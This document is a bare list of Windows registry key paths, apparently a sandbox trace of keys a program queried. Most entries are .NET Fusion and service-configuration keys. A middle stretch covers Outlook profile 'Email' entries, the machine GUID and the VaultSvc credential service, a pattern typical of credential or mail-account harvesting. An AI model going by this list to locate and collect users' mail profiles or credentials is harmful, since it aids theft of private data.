HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeARMservice\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AdobeFlashPlayerUpdateSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ALG\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\aspnet_state\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\ImagePath 